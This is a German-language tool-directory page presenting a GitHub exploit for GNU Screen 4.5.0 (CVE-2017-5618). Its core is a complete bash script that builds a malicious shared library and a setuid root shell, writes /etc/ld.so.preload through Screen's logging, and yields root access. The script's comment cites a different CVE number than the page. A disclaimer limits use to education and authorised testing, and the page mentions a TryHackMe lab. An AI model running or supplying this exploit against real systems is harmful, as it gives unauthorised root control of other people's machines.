Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — Lokaler Privilege-Escalation-Exploit für GNU Screen 4.5.0 (CVE-2017-5618). Nutzt eine Schwachstelle in der Protokollierungsfunktion aus, um das Laden von Shared Libraries zu kapern und durch Manipulation von ld.so.preload Root-Zugriff zu erlangen. Betroffen: Screen 4.5.0 (SUID) Behoben in: Screen 4.6.0+ | Kitploit
Tools/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
Privilege EscalationExploitationPenetrationstestsLernen & BildungBinary-ExploitationLabs & Praxis
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Lokaler Privilege-Escalation-Exploit für GNU Screen 4.5.0 (CVE-2017-5618). Nutzt eine Schwachstelle in der Protokollierungsfunktion aus, um das Laden von Shared Libraries zu kapern und durch Manipulation von ld.so.preload Root-Zugriff zu erlangen. Betroffen: Screen 4.5.0 (SUID) Behoben in: Screen 4.6.0+

Teilen
32vor 11 MonatenNoch nicht geprüft

GNU Screen 4.5.0 Lokaler Privilege-Escalation-Exploit (CVE-2017-5618)

📌 Übersicht

Lokaler Privilege-Escalation-Exploit für GNU Screen 4.5.0, der das Laden gemeinsamer Bibliotheken kapert, um über die Manipulation von ld.so.preload Root-Zugriff zu erlangen.

🔧 Technische Details

Verwundbarkeit: CVE-2017-5618

Typ: Hijacking gemeinsamer Bibliotheken über ld.so.preload

Betroffen: Ausschließlich GNU Screen 4.5.0

Behoben in: GNU Screen 4.6.0+

🎪 Der Verwundbarkeits-Zirkus

CVE: 2017-5618 🎯

Der Bug: Screen 4.5.0 erstellt Logdateien mit GEFÄHRLICHEN Berechtigungen

Die Magie: Wir bringen es dazu, /etc/ld.so.preload zu erstellen, das unsere bösartige Bibliothek lädt

Die Nutzlast: Sofortige Root-Shell! 🐚

Skript 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

Screenshots

Prüfen der verwundbaren Screen-Version.

Screen version detected

Erstellen der Datei und Gewähren der erforderlichen Berechtigungen.

Making

Root-Zugriff erlangt.

Root

Root-Shell erreicht – volle Systemkontrolle

⚠️ Warnhinweis

NUR FÜR BILDUNGSZWECKE! ⚠️ Sei kein Script-Kiddie – nutze dies nur auf Systemen, die dir gehören oder für die du ausdrücklich die Erlaubnis zum Testen hast.

Getestet auf

TryHackMe KOTH Room - Food

Tool herunterladen